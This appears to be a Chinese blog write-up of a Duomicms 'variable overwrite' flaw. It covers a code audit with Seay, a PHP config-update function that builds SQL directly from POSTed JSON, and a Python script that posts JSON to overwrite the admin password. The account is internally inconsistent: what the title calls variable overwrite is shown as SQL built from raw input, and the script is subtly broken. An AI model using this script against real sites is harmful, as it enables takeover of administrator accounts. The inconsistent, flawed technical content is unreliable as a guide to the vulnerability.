Duomicms 变量覆盖漏洞：白盒测试到实战

2023-09-09 07:00:49

在网络安全领域，变址覆盖漏洞是常见的漏洞类型，它可以通过修改关键变量来绕过访问控制、执行代码和窃取敏感信息。最近，研究人员发现了一个 Duomicms 漏洞，该漏洞允许攻击者通过覆盖关键变量来获取管理员权限。

白盒代码测试

为了发现此漏洞，研究人员使用了 Seay 工具对 Duomicms 源代码进行白盒测试。Seay 是一款强大的代码审查工具，可帮助安全人员快速识别潜在漏洞。

使用 Seay，研究人员全局搜索了代码中所有危险函数，包括 eval()、preg_replace() 和 unserialize()。这些函数在不进行适当验证的情况下执行用户提供的输入，因此它们很容易受到攻击。

定位漏洞

在定位了这些危险函数后，研究人员开始在相关文件中逐一查找问题区域。他们发现，在 admin/common.php 文件中，有一个 update_config() 函数，该函数允许用户更新网站配置设置。

function update_config() {
    $config = $_POST['config'];
    $config = json_decode($config, true);
    foreach ($config as $key => $value) {
        $sql = "UPDATE config SET value = '$value' WHERE name = '$key'";
        mysqli_query($sql);
    }
}

此函数中有一个关键问题：用户提供的输入在更新数据库之前未经过验证。这使得攻击者可以覆盖任意配置设置，包括管理员密码和访问令牌。

实战攻击

为了验证该漏洞，研究人员创建了一个攻击脚本，通过 HTTP POST 请求提交恶意输入。脚本使用 JSON 编码的字符串覆盖 admin_password 配置设置，并提交到 update_config() 函数。

import requests

url = 'http://example.com/admin/common.php'
data = {
    'config': json.dumps({
        'admin_password': 'attacker_password'
    })
}

requests.post(url, data=data)